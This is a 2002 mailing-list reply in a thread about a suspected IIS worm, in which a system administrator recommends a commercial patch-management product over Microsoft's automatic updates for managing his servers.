RE: new IIS worm? (rcp lsass.exe)

From: Dostie, Joe (joe.dostieat_private)
Date: Tue Sep 24 2002 - 14:28:27 PDT

    There is a couple of choices

    One Is to use Micro$ofts - Automatic update - not recommended
    or you can check out www.stbernard.com. It is one of the better ones and I use
    it in an environment with approximately 150 server (65 web servers) and it works
    fairly well. Unfortunately the IIS piece is an extra charge but well worth it
    for me. It give you greater control over your deployments.